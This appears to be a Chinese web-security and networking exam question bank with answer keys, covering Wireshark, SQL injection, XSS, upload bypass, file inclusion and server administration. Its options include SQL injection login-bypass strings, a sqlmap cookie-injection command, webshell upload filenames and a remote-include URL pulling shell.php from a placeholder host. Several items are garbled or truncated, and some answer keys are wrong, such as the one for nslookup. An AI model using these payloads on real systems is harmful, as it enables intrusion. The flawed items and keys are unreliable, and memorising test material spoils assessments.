21、wireshark 中,Statistics菜单项下的 Protocol Hierarchy 选项主要功能是什么?

A、 显示捕捉数据摘要

B、 显示协议统计分层信息

C、 显示会话列表

D、 显示端点列表

标准答案: B

22、wireshark中最活跃的通讯端点,并不一定包括流量最大的会话,是否正确?

A、 对

B、 错

标准答案: A

23、在IO Graphs 中,可以使用哪项命令排查有丢失的数据包?

A、 tcp.analysis.lost_segment

B、 tcp.analysis.window_update

C、 tcp.analysis.ack_rtt

D、 tcp.analysis.duplicate_ack

标准答案: A

24、我们可以使用 wireshark 中的 IO Graph来对网络整体流量信息进行显示分析,是否正确?

A、 对

B、 错

标准答案: A

25、以下哪个文件夹存放的是 wireshark 负责解析网络协议文件?

A、 Core

B、 Capture

C、 Epan

D、 Wiretap

标准答案: C

26、FTP协议使用443端口而不是标准21端口时,我们可以强制将解析错误的包按照指定协议解析,是否正确?

A、 对

B、 错

标准答案: A

27、设置后,达到无法通过客户端 JavaScript 直接访问 Cookie 的选项是

A、 Domain

B、 Expires

C、 Secure

D、 HttpOnly

标准答案: D

28、下列选项中,状态码解释错误的选项是

A、 200: 表示已成功提交请求,且相应主体中包含请求结果

B、 400: 表示客户端提交了一个无效的 HTTP 请求

C、 414: 服务器无法处理客户端发送的不带Content-Length的请求信息

D、 500:服务器内部错误,无法完成请求

标准答案: C

29、下列选项中,表示将浏览器暂时重定向到另外一个在 Location 消息头中指定的 URL 的状态码是

A、 100

B、 201

C、 302

D、 403

标准答案: C

30、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()

A、 对

B、 错

标准答案: A

31、下列 URL 编码解释错误的是:

A、 %3d 代表 =

B、 %25 代表 %

C、 %0a 代表新行

D、 %00 代表空格

标准答案: D

32、下面 HTML 编码解释错误的是:

A、 ” 代表 ”

B、 &apos 代表 ’

C、 < 代表 <

D、 > 代表 <

标准答案: D

33、如果没有启用 WebDAV 扩展,OPTIONS 命令是无法查看 IIS 支持的方法集合的。即便是复选上了“写入”,仍然无法写入 txt 文件。该说法正确吗()

A、 对

B、 错

标准答案: A

34、动态语言,服务器和客户端代码不一致;静态语言,服务端和客户端代码一致。该说法是否正确()

A、 对

B、 错

标准答案: A

35、下列一键 PHP 环境的工具中,不可以安装在 Linux 中的是()

A、 PHPStudy

B、 PHPNow

C、 WampServer

D、 XAMPP

标准答案: C

36、下列 ASP 接受参数的方式错误的是()

A、 request

B、 request.get

C、 request.cookie

D、 request.form

标准答案: B

37、下列链接中不存在注入点的是()

A、 http://www.****.com/***.asp?id=XX

B、 http://www.****.com/***.php?name=XX&page=99

C、 http://www.****.com/index/new/php-8.html

D、 http://www.****.com/news.html

标准答案: D

38、下列 mysql 的 PHP 函数说法错误的是()

A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接

B、 mysql_db_select($database, $conn); 选择数据库

C、 mysql_query($sql, $conn); 执行 SQL 语句

D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中

标准答案: B

39、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()

A、 对

B、 错

标准答案: A

40、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()

A、 用户名输入: ‘(或”) AND 1 = 1– ;密码随便输入

B、 用户名输入: ‘(或”) && 1 = 1– ;密码随便输入

C、 用户名输入: ‘(或”) OR 1 = 1– ;密码随便输入

D、 用户名输入: ‘(或”) || 1 = 1– ;密码随便输入

标准答案: C

41、已知 SQL 语句为:s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `member` WHERE `username` = &quot;&#x27;.sql=SELECTFROMmemberWHEREusername=._GET[‘name’].’” AND password = “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin” OR “1”=“2&pwd=” OR “1”=”1 时,可以完成用户验证吗()

A、 对

B、 错

标准答案: A

42、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `memeber` WHERE `username` = &quot;&#x27;.sql=SELECTFROMmemeberWHEREusername=.user.’” AND pass = “’.$pass.’”’,下列能成功执行注入的是()

A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;

B、 $user = ‘admin OR 1 = 2’; $pass = ‘” OR 1 = 1’;

C、 $user = ‘admin” OR 1 = 1’; $pass = ‘” OR 1 = 2’;

D、 $user = ‘admin” OR “1” = “2’; $pass = ‘” OR “1” = “1’;

标准答案: D

43、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()

A、 对

B、 错

标准答案: A

44、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()

A、 4

B、 5

C、 6

D、 7

标准答案: B

45、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()

A、 5

B、 6

C、 7

D、 8

标准答案: B

46、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()

A、 所有数据库

B、 所有表

C、 所有字段

D、 所有字段类型

标准答案: A

47、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()

A、 TABLES

B、 SCHEMATA

C、 COLUMNS

D、 DATABASES

标准答案: B

48、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()

A、 对

B、 错

标准答案: A

49、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()

A、 SELECT user(),version(),database();

B、 SELECT user(),’,’,version(),’,’,database();

C、 SELECT user().version().database();

D、 SELECT group_concat(user(),version(),database());

标准答案: D

50、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()

A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;

B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;

C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;

D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;

标准答案: B

1、下列有关 ASP、PHP 接受参数的方式错误的是()

A、 ASP:request.get(接收 get 传参)

B、 PHP:$_GET(接收 get 传参)

C、 ASP:request(全部接收)

D、 PHP:$_REQUEST(全部接收)

标准答案: A

2、当使用 Burp 进行 Cookie 手工注入的时候,下列可以判断是否报错的是()

A、 X-Powered-By

B、 Content-Length

C、 Content-Type

D、 Cache-control

标准答案: B

3、下列命令能实现 SQLMap Cookie 注入的是()

A、 sqlmap.py -u “http://www.xxx.com/product.php?id=58

B、 sqlmap.py -u “http://www.xxx.com/product.php” –data “id=58”

C、 sqlmap.py -u “http://www.xxx.com/product.php” –data “id=58” –level 1

D、 sqlmap.py -u “http://www.xxx.com/product.php” –cookie “id=58” –level 2

标准答案: D

4、XSS属于服务端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一

A、 对

B、 错

标准答案: B

5、存储型XSS,持久化,代码是存储在服务器中的;反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码

A、 对

B、 错

标准答案: A

6、下面属于隐蔽型的 XSS 的选项是:

A、 反射型 XSS

B、 存储型 XSS

C、 不持久型 XSS

标准答案: B

7、当网站对

A、 alert(1)

B、

C、 

D、 alert(1)

标准答案: C

8、XSS能够对网站进行攻击且造成网站权限丢失()

A、 对

B、 错

标准答案: B

9、下面上传突破说法错误的是()

A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传

B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传

C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破

D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破

标准答案: D

10、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()

A、 对

B、 错

标准答案: A

11、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()

A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面

B、 直接在抓的包中修改 Content-Type

C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00

标准答案: C

12、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()

A、 对

B、 错

标准答案: A

13、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()

A、 上传文件 shell.PhP

B、 上传文件 shell.php4

C、 上传文件 shell.php3

D、 上传文件 shell.php .jpg

标准答案: A

14、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()

A、 对

B、 错

标准答案: A

15、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()

A、 对

B、 错

标准答案: A

16、下列即属于黑名单检测绕过又属于白名单检测绕过的是()

A、 文件名大小写绕过

B、 名单列表绕过

C、 特殊文件名绕过(windows)

D、 0x00 截断绕过

标准答案: D

17、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()

A、 对

B、 错

标准答案: A

18、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()

A、 http://www.mubiao.com/file.php?read=../../../image/shell.php

B、 http://www.mubiao.com/file.php?read=/image/shell.php

C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php

D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php

标准答案: D

19、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()

A、 对

B、 错

标准答案: B

20、对第三方组件慎重使用说法错误是():

A、 尽量从官方渠道下载第三方组件

B、 对第三方组件的安全测试

C、 对第三方组件不需要安全加固、补丁更新

D、 对第三方组件的定期升级计划

标准答案: C

21、为了减少编程错误引起的安全缺陷,Java开发者不应该遵循建议的安全开发规范。()

A、 对

B、 错

标准答案: B

22、通过恶意手段耗尽被攻击对象的资源,让目标计算机或网络服务无法提供正常的服务、资源访问,使目标服务系统停止响应崩溃。

A、 对

B、 错

标准答案: A

23、下面这段XML代码,当程序加载的时候,会尝试写一段代码到/dev/tty文件里。

A、 对

B、 错

标准答案: B

24、JAVA出现数组越界,不会抛出异常,会继续执行。

A、 对

B、 错

标准答案: B

25、安全部署前、中、后的那一句是正确的():

A、 部署后进行漏洞扫描,渗透测试,日常运维,包括WEB漏洞扫描

B、 发现缺陷部署前,不需要对软件安全检测

C、 基础软件的安全性不影响将来承载的应用软件的安全性

D、 部署中应关闭上线过程临时开放的端口服务

标准答案: A

26、常见的安全需求主要包括:身份认证,会话管理,访问控制,权限管理,数据保护,安全审计,异常处理。()

A、 对

B、 错

标准答案: B

27、访问控制有两个方面:限制用户对资源的访问,资源请求数量限制。对IP进行控制,采用统一的访问控制机制,在服务器端实现访问控制。()

A、 对

B、 错

标准答案: A

28、对于源代码审计安全缺陷,不是外部输入风险的是():

A、 终端输入数据

B、 第三方来源的数据

C、 拒绝服务的防御

D、 数据库中的数据

标准答案: C

29、源代码审计配置文件说法错误的是():

A、 已知恶意的数据拉入黑名单,白名单只允许少数机器访问

B、 账号长度避免使用弱口令,限制输入次数错误的登录

C、 记录日志安全不需要开启服务

D、 执行化配置文件存储了开发的信息,弱口令,连接地址,通讯方式等

标准答案: C

30、下面代码是动态构造的,不是典型的动态sql注入。():

A、 对

B、 错

标准答案: B

31、下面代码中,使用指针p之前没有检查p是否为空,不造成安全隐患。()

A、 对

B、 错

标准答案: B

32、下面代码中,判断指针p是否为NULL,判断前调用log函数没使用p,NULL指针引用没问题。()

A、 对

B、 错

标准答案: B

33、关于Windows2003版本说法正确的是():

A、 Windows2003标准版有Web版本的所有功能

B、 Windows2003标准版增加了Metadirectory Services Support、集群、热添加(Hot-Add)内存、终端服务会话目录等功能,还增加一个支持64位计算版本

C、 Windows2003 Web版有全部版本的所有功能

D、 Windows2003企业版支持高达8-32路处理器,64G内存,8节点的集群,增加了一个数据中心程序包

标准答案: A

34、下面添加或删除Windwos程序正确说法是():

A、 添加/删除Windows组件可以安装第三方网络服务

B、 Windows网络服务每一个对应的软件在系统里面不是一个组件

C、 添加/删除Windows组件可以添加终端服务组件

D、 更改或删除程序里可以删除安装程序和Windows组件

标准答案: C

35、连接到Internet和连接到工作区,连接错误是():

A、 连接到Internet,用拨号调制解调器连接

B、 连接到我的工作场所创建VPN网络,虚拟专用网络连接

C、 连接到Internet,用要求用户名和密码的宽带连接来连接

D、 连接到我的工作场所创建VPN网络,直接拨号连接

标准答案: D

36、本地连接Internet(TCP/IP)属性设置错误是():

A、 DHCP自动对局域网所有用户计算机分配IP地址

B、 设置静态IP,DNS不填写,可以连接到网络

C、 默认网关参数不设置,不能连接网络

D、 子网掩码默认自动获取

标准答案: B

37、本地系统账户和域用户账户的区别说法错误的是():

A、 本地系统账户是本机建立的用户账户,域账户是域服务器上由管理员分配给你的账户

B、 域账户是域控制器上创建的账户,所有域账户都不属于domain users组

C、 域管理员帐号属于domain admins组,具有管理域控制器的权限

D、 本地账户可以登录到域上,并获得访问该网络的权限

标准答案: B

38、使用Administrator对计算机或配置进行管理正确的是():

A、 本地Administrator账户可以更名,也可以删除

B、 Administrator账户不能完全控制整台计算机

C、 在执行管理任务时使用普通用户,执行非管理用户是使用Administrator管理员

D、 Administrator账户可以创建修改用户账户和组,管理安全策略,创建打印机,分配允许用户访问资源的权限等

标准答案: D

39、对于内置组账户和创建新组账户说法错误是():

A、 创建新组账户是在本地安全设置里用户权限分配设置

B、 内置组账户具有完全控制、从网络访问计算机、调整进程的内存配额、允许本地登录、指派等权限

C、 系统内置默认的组账户都不能删除

D、 创建新组用户有内置用户组的所有权限

标准答案: D

40、下面对NTFS文件系统功能说法错误的是():

A、 可以设置权限

B、 磁盘映射访问

C、 文件加密

D、 磁盘配额

标准答案: B

41、文件夹和文件权限定义说法错误的是():

A、 文件夹权限:完全控制,可以执行所有操作

B、 文件权限:完全控制,特别的权限

C、 文件权限:修改,读取,运行,写入

D、 文件夹权限:与文件和文件夹的数据有关,与安全选项卡读取、更改无关

标准答案: D

42、NTFS文件系统相对于FAT和FAT32文件系统来说,对文件资源保护,文件资源的安全性存在风险。()

A、 对

B、 错

标准答案: B

43、复制操作:不同NTFS分区和同NTFS分区都继承目的地权限。()

A、 对

B、 错

标准答案: A

44、移动操作:同NTFS分区移动不保留原有权限,不同NTFS分区移动则继承目的地权限。()

A、 对

B、 错

标准答案: B

45、DHCP服务器中的设置数据全部存放在名为dhcp.mdb数据库文件中,该文件位于Windows\ SysWOW64\dhcp文件夹内。()

A、 对

B、 错

标准答案: B

46、DHCP服务器和DHCP客户端处于不同的广播域,如何解决?()

A、 解除三层设备

B、 转发广播报文

C、 关闭广播中继

D、 开启DHCP中继功能

标准答案: D

47、在大型网络中,每台终端的地址都是有不同的使用来分配,出现地址相同,不会发生冲突。()

A、 对

B、 错

标准答案: B

48、如果要解析一个网站IP,在本地连接“设置DNS服务器地址”域到查询请求的IP,置顶向下解析正确的是():

A、 本地域名服务器,查缓存、本地数据库,二级域名服务器,顶级域名服务器,根域名服务器,返回结果

B、 根域名服务器,二级域名服务器,顶级域名服务器,返回结果

C、 查缓存、本地数据库,根域名服务器,顶级域名服务器,二级域名服务器,返回结果

D、 本地域名服务器,根域名服务器,顶级域名服务器,二级域名服务器,返回结果

标准答案: D

49、对DNS的数据文件说法错误的是():

A、 区域的数据都是存储在DNS服务器内的区域文件内

B、 区域文件和缓存文件存储在“%systemroot%\SysWOW64\dns”

C、 缓存文件存储着根域内的DNS服务器名称与IP地址的对照数据

D、 区域文件名为zonename.dns,缓存文件名为cacheddns

标准答案: B

50、在ftp传输过程中,为了定位ftp传输开始的数据包位置,筛选器的命令应该是

A、 ftp.request.command==

B、 ftp.request.command==

C、 ftp.request.command==

D、 ftp.request.command ==

标准答案: C

1、wireshark哪个功能可以提取传输文件

A、 flow graph

B、 throughput graph

C、 follow tcp stream

D、 udp multicast streams

标准答案: C

2、wireshark通信流量图可以提供ftp通信的快速视图

A、 对

B、 错

标准答案: A

3、在wireshark所抓数据包分析里,客户端出现响应延迟的标志是

A、 初始握手SYN,ACK包time值较高

B、 初始握手后的GET包time值较高

C、 初始握手后的ACK包time值较高

标准答案: B

4、在wireshark所抓数据包分析里,SYN响应包是ACK

A、 对

B、 错

标准答案: B

5、在wireshark所抓数据包分析里,拆除SSL连接的数据包是哪个

A、 FIN,ACK

B、 SYN,ACK

C、 ACK

D、 SYN

标准答案: A

6、处于同一网络内可以拦截https明文传输内容

A、 对

B、 错

标准答案: B

7、在wireshark中若捕获了30个DNS数据包,则说明捕获的数据包中存在有多少个DNS相关事务

A、 30个

B、 15个

C、 10个

标准答案: B

8、通过wireshark哪个功能可以查看http请求的所有域名的统计信息

A、 statistics的conversations功能

B、 statistics的collectd功能

C、 statistics的http功能

标准答案: C

9、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗

A、 对

B、 错

标准答案: A

10、目标服务器端口关闭时,扫描器会

A、 没有收到数据包

B、 收到RST数据包

C、 收到SYN/ACK数据包

D、 收到FIN/ACK数据包

标准答案: B

11、筛选端口号为443的所有数据包时过滤器的语句是tcp.dstport==443

A、 对

B、 错

标准答案: B

12、扫描windows系统时收到的TTL是

A、 64

B、 128

C、 255

标准答案: B

13、nmap可以进行主动扫描

A、 对

B、 错

标准答案: A

14、ARP攻击成功后的标志是

A、 HTTP包中远程地址不变,MAC地址变为攻击者地址

B、 HTTP包中MAC地址不变,远程地址变为攻击者地址

C、 HTTP包中MAC地址和远程地址均变成攻击者的地址

标准答案: A

15、攻击者的ARP包中目标MAC地址指向被攻击的MAC地址

A、 对

B、 错

标准答案: A

16、通过wireshark哪个功能可以查找快速特定字符串

A、 Filter

B、 Find Packet

C、 Follow TCP Stream

标准答案: B

17、JPG文件头的十六进制码是

A、 47 49

B、 FF D8

C、 89 50

标准答案: B

18、在wireshark中使用IO Graphs可以查看会话流,这种说法对吗

A、 对

B、 错

标准答案: A

19、手机中广泛使用的协议是

A、 DNS

B、 TCP

C、 UDP

标准答案: C

20、在wireshark捕获的数据包中,通过哪些字段可以获得浏览器及系统版本相关信息

A、 Host

B、 Accept-Language

C、 Cookie

D、 User-Agent

标准答案: D

21、wireshark过滤器中输入dns可以显示所有dns相关的数据包

A、 对

B、 错

标准答案: A

22、apache核心配置文件是

A、 /etc/http/conf/http.conf

B、 /etc/httpd/conf/http.conf

C、 /etc/http/conf/httpd.conf

D、 /etc/httpd/conf/httpd.conf

标准答案: D

23、apache配置文件中的代表的是

A、 系统根目录

B、 用户根目录

C、 网站根目录

D、 配置目录

标准答案: C

24、网站默认页可以在apache文件中的哪个标签中设置

A、 AccessFileName

B、 Files

C、 Directory

D、 DirectoryIndex

标准答案: D

25、若需要设置访问认证,则应该在哪个文件中配置

A、 index.html

B、 .htaccess

C、 http.conf

标准答案: B

26、检查apache是否安装的命令是rpm -q httpd

A、 对

B、 错

标准答案: A

27、在ftp配置中,若要允许匿名用户登陆则应如何配置

A、 guest_enable=YES

B、 local_enable=YES

C、 anonymous_enable=YES

标准答案: C

28、检查apache是否安装的命令是rpm -q vsftp

A、 对

B、 错

标准答案: B

29、Sendmail服务器的配置文件是

A、 /etc/mail/sendmail.mc

B、 /etc/mail/sendmail.conf

C、 /etc/sendmail/sendmail.mc

D、 /etc/sendmail/sendmail.conf

标准答案: A

30、Sendmail的access文件中代表返回错误信息的是

A、 OK

B、 REJECT

C、 DISCARD

D、 RELAY

标准答案: B

31、Sendmail的别名功能不能进行转发

A、 对

B、 错

标准答案: B

32、jQuery在哪个版本以下存在公开的XSS漏洞?( )

A、 1.5

B、 1.6

C、 1.7

D、 1.8

标准答案: C

33、目录浏览漏洞是由于哪项配置不当引起的?( )

A、 Web服务权限

B、 数据库配置

C、 服务器端口

D、 输入输出过滤

标准答案: A

34、下列哪项不属于移动端应用安全防护措施?()

A、 加壳

B、 代码混淆

C、 完整性验证

D、 WAF

标准答案: D

35、下列哪项不属于移动应用安全检测分析中对数据安全性的检测?()

A、 数据输入

B、 输入存储

C、 数据复制数据输出

D、 MAC地址

标准答案: C

36、使用Apktool对apk文件进行反编译,得到程序文件是什么语言?( )

A、 Java

B、 Smali

C、 C++

D、 ARM

标准答案: B

37、使用apktool进行回编译应该使用哪个参数?( )

A、 s

B、 b

C、 rf

D、 d

标准答案: B

38、要抓取移动设备HTTPS的数据包,需要在该设备上进行那种设置?

A、 安装ca证书

B、 安装Burp Suite

C、 Root

D、 修改Host

标准答案: A

39、渗透测试的流程中不包含以下哪些流程

A、 信息搜集

B、 渗透测试

C、 痕迹清除

D、 后门植入

标准答案: D

40、应用层收集的信息不包括以下哪种

A、 Web服务器指纹

B、 网站后台

C、 DNS域传送漏洞

D、 服务器提供商

标准答案: D

41、认证与会话部分经常出现的漏洞有哪些

A、 目录遍历

B、 文件包含

C、 XSS

D、 Session劫持

标准答案: D

42、以下哪款工具可以判断目标网站是否使用了WAF?( )

A、 Nmap

B、 nslookup

C、 wafw00f

D、 Ping

标准答案: C

43、Nslookup的作用是什么?()

A、 查询目标网站的DNS解析

B、 查看目标站点的操作系统版本

C、 对目标服务器的开放端口进行扫描

D、 爆破邮箱密码

标准答案: B

44、解决企业中安全事件流程繁琐踢皮球的有效方式是什么? ( )

A、 建立安全评审组

B、 成立SRC

C、 设置安全响应机制

D、 购买安全服务

标准答案: A

45、风险评估的目的是更好地了解风险、把握风险,并对风险作出防范措施

A、 对

B、 错

标准答案: A

46、利用IBM Security Appscan Standard工具扫描网站时,如果目标网站过大,可以采用哪种方式提高效率?( )

A、 正则表达式

B、 环境定义

C、 自动表单填充

D、 多步骤操作

标准答案: A

47、风险评估过程中,通过相关工具发现网站漏洞后,接下来应该就进行的操作是什么?( )

A、 上传后门

B、 总结并上报

C、 置之不理

D、 帮忙修复

标准答案: B

48、纳入企业安全体系中的工作流程有哪些?( )

A、 代码上线

B、 安全意识培养

C、 绩效管理

D、 产品设计

标准答案:

49、防御文件包含漏洞的方法不包括()

A、 避免外界指定文件名

B、 拒绝上传文件

C、 文件名中不可包含目录名

D、 限定文件名中仅包含字母与数字

标准答案: B

50、Linux中,mod_security安装成功后,安装在下面哪个文件夹中?()

A、 /var/mod_security

B、 /apache

C、 /etc/init.d

D、 /home/user

标准答案: B

1、Linux环境搭建中,如果出现IPV4地址与DVWA不吻合,需要在编辑哪个文件()?

A、 /etc/hosts

B、 /etc/file

C、 /var/www/dvwa

D、 /etc/address

标准答案: A

2、如果部署于计算机的有WAF经常出现误报的现象,有哪些有效的解决方法?( )

A、 注销规则

B、 修改阈值

C、 检测服务器

D、 对规则进行过滤

标准答案: B

3、Snort中匹配到sqlmap关键字,但实际并没有遭受攻击,原因是有可能是什么?( )

A、 系统自我修复

B、 攻击者无法注入

C、 规则不严谨

D、 攻击者未攻击成功

标准答案: C

4、snort规则代码中每修改一次,版本号要增加1,表示版本号的是()

A、 msg

B、 content

C、 sid

D、 rev

标准答案: D

5、对攻击者入侵调查取证原则不包括()

A、 找到事件本质

B、 多尝试

C、 逆向思考

D、 搜集攻击者信息

标准答案: D

6、当发现攻击者进行SQL注入攻击时被拦截并获取其IP地址时,应当如何处理?()

A、 追踪攻击者的痕迹

B、 备份并查看日志,保存证据

C、 不当回事

D、 直接告诫攻击者

标准答案: B

7、Python通过哪个模块对正则表达式提供支持?( )

A、 re

B、 time

C、 sys

D、 thread

标准答案: A

8、Python正则表达式模块,使用“\D”来匹配什么内容?( )

A、 字母

B、 非字母

C、 数字

D、 非数字

标准答案: D

9、Python正则表达式模块,使用“{m}”的匹配什么内容?( )

A、 匹配前一个字符m次

B、 匹配后一个字符m次

C、 匹配长度为m的单词

D、 匹配长度为m的数字

标准答案: A

10、使用贪婪模式“ab*”来匹配“abbbcba”得到的结果是?( )

A、 ab

B、 abbb

C、 abbbcb

D、 abbbc

标准答案: B

11、若想匹配出“<div class=”coursename”> title=”ThisClass” onclick …… </div>”中的课程名称ThisClass,使用下列哪个正则表达式可以做到?( )

A、 <div class=”classname”title=”.*?onclick”>

B、 <div class=”classname”title=”(.*?)onclick”>

C、 div class=“coursename”> title=”(.*?)” onclick …… ”

D、 <div class=”(.?)”title=.?</div>

标准答案: C

12、Python中若是用ulrlib库请求指定URL页面的内容,应该使用哪个函数?( )

A、 urlopen()

B、 add_header

C、 fileopen()

D、 sleep()

标准答案: A

13、Python中安装第三方库应该使用什么命令?( )

A、 pip install

B、 apt-get install

C、 brew cask install

D、 yum

标准答案: A

14、Python的request库中,是用什么方式查看返回的HTTP状态码?( )

A、 requests.statuscode

B、 requests.responsecode

C、 requests.header

D、 requests.cookie

标准答案: A

15、假如在编写爬虫时,目标网站进行了防爬处理,应该在代码中添加什么内容?( )

A、 将抓取的内容解密

B、 设置请求的header

C、 设置请求的cookie

D、 更换请求类型

标准答案: B

16、以下关于进程和线程的描述错误的是?

A、 每个进程都有自己的内存地址空间和数据栈

B、 一个进程至少有一个线程

C、 线程能够独立执行

D、 同一个进程的多线程,可以共享内容空间

标准答案: C

17、Python中可以使用threading模块进行多线程程序的编写,一个新的线程的开启应当使用哪个函数?

A、 t.join()

B、 t.start_new_thread()

C、 t.append()

D、 t.sleep()

标准答案: B

18、在Python多线程程序中引入Queue模块可以解决什么问题?()

A、 生产参数和计算结果时间不确定的问题

B、 Thread模块不能分布式编程的问题

C、 Thread模块性能不足的问题

D、 多线程操作变量混乱的问题

标准答案: C

19、在不考虑硬件环境的前提下,Python中Queue的长度可以是无限的。

A、 对

B、 错

标准答案: A

20、Queue模块有多重队列产生模式,其默认的队列模式是什么?( )

A、 FIFO

B、 LIFO

C、 FEFO

D、 LEFO

标准答案: A

21、C/S架构中,C和S分别代表什么?( )

A、 Client和Sever

B、 Computer和Signal

C、 Computer和Socket

D、 Client与Socket

标准答案: A

22、网络化的应用程序在开始仁和通讯之前都必须创建套接字。

A、 对

B、 错

标准答案: A

23、Python中的Socket模块里,用于发送UDP数据的是什么函数?( )

A、 s.send()

B、 s.recv()

C、 s.sendall()

D、 s.sendto()

标准答案: D

24、在Python没有DB API之前,通过什么方式对数据库进行操作?( )

A、 数据库GUI接口

B、 数据库接口程序

C、 SQLmap

D、 PHPMyAdmin

标准答案: B

25、如何建立Python客户端与MySQL数据库的网络连接?( )

A、 MySQLdb.Connect

B、 Cursor.execute()

C、 Connection.cursor

D、 Connection.close

标准答案: A

26、Python数据库编程中如何执行一条数据库查询指令?( )

A、 execute(op[,args])

B、 fetchone()

C、 fetchall()

D、 rowcount

标准答案: A

27、以下哪个选项的内容可以创建一个FSO对象(IIS内置组件),用于操作磁盘文件?()

A、 set fso=server.createobject(“scripting.filesystemobject”)

B、 set fso=server.createobject(“scripting.filesystem”)

C、 set fso=request.createobject(“scripting.filesystemobject”)

D、 set fso=request.createobject(“scripting.fileobject”)

标准答案: A

28、Windows下执行cmd命令”copy 1.txt \.\c:\aux.txt”,生成的aux.txt要如何删除呢?()

A、 del c:\aux.txt

B、 del aux.txt

C、 del \.\c:\aux.txt

D、 del .\c:\aux.txt

标准答案: C

29、通过IIS内置组件FSO对象的哪个方法可以创建一个文件操作对象?()

A、 createtextfile

B、 createbufferfile

C、 gettextfile

D、 getbufferfile

标准答案: A

30、IIS无法禁止用户下载以mdb为尾缀的文件。

A、 对

B、 错

标准答案: B

31、PHP中哪个函数可以创建一个新文件?()

A、 fopen

B、 fwrite

C、 fclose

D、 fgetfile

标准答案: A

32、PHP函数isset()的功能是什么?()

A、 检测变量是否为空

B、 检测变量是否为数字

C、 检测变量是否设置值

D、 检测变量是否为字符串

标准答案: C

33、以下哪个PHP的伪协议可以接收POST数据?()

A、 php://input

B、 php://fd

C、 php://filter

D、 php://temp

标准答案: A

34、以下哪种文件名称可以利用Apache的解析漏洞来运行脚本?()

A、 test.jpg.html

B、 test.php.xxx

C、 test.jpg.xxx

D、 test.html.xxx

标准答案: B

35、存在解析漏洞的Apache会将test.html.x1.x2.x3文件识别为html文件。

A、 对

B、 错

标准答案: A

36、网络安全防护体系在战略方面应该以什么为核心?()

A、 技术

B、 人

C、 设备

D、 网络

标准答案: B

37、网络安全防护体系在战术方面应该以什么为手段?()

A、 技术

B、 攻防

C、 情报

D、 设备

标准答案: C

38、网络安全威胁情报的八个核心要素不包括以下哪个选项?()

A、 被攻击系统

B、 设备

C、 动机

D、 威胁源

标准答案: B

39、缩短攻击者的自由攻击时间成为了安全事件应急响应的关键。

A、 对

B、 错

标准答案: A

40、以下哪个选项的标准不属于网络安全威胁情报?()

A、 TAXII

B、 Cybox

C、 TCIA

D、 STIX

标准答案: C

41、威胁情报进行信息共享过程中要注意信息的隐私问题。

A、 对

B、 错

标准答案: A

42、Wireshark命令行下查看文件概述信息的命令是()

A、 test2pcap

B、 capinfos

C、 rawshark

D、 tshark

标准答案: B

